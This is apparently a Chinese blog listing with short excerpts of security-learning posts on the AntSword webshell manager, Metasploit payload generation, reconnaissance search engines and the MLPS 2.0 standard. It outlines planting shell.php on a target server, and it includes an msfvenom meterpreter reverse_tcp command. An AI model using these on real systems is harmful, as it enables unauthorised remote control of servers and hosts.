- 博客(7)
- 收藏
- 关注
RSS订阅原创 蚁剑的应用
1.点击antsword,点击菜单,选择proxy setting。在目标服务器web目录下新建shell,命名为shell.php。点击初始化,若未下载核心源码,新建一个文件夹并选择,会自动下载。打开antsword,单击右键,选择添加数据。双击刚刚的shell即可进入文件管理界面。2.在代理设置中选择连接shell的方式。下载完成后,退出重启即可。
2024-10-31 10:05:56
568
原创 复现对被控端控制,生成的被控端放入网站检测
打开kali,以管理员身份在控制端输入msfvenom -p windows/meterpreter/reverse_tcp lhost=靶机ip。
2024-10-29 23:02:01
218
原创 与ZoomEye功能类似的搜索引擎
Shodan:被称为“物联网的搜索引擎”,专注于扫描和索引连接到互联网的各种设备,如智能家居设备、工业控制系统、摄像头、数据库等。Onyphe:面向网络安全专业人士的数据搜索引擎,汇集了多个来源的数据,包括开放端口、漏洞、情报和暗网活动等。字典枚举工具:使用如Sublist3r、OneForAll等工具,对目标域名进行自动化的子域名枚举。DNS响应分析:使用工具如nmap的DNS枚举脚本来分析目标域名的DNS响应,发现子域名。证书透明度查询:访问crt.sh等网站,输入目标域名,查找相关的TLS证书信息。
2024-10-08 16:25:52
883
原创 对等保2.0的理解
7.控制措施分类结构变化:在技术上,由物理安全、网络安全、主机安全、应用安全、数据安全,变更为安全物理环境、安全通信网络、安全区域边界、安全计算环境、安全管理中心;在管理上,从安全管理制度、安全管理机构、人员安全管理、系统建设管理、系统运维管理,调整为安全管理制度、安全管理机构、安全管理人员、安全建设管理、安全运维管理。8. 内容扩展:在定级、备案、建设整改、等级测评和监督检查五个规定动作的基础上,增加了新的安全要求,如风险评估、安全监测、通报预警、态势感知等。
2024-10-08 13:35:46
376
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人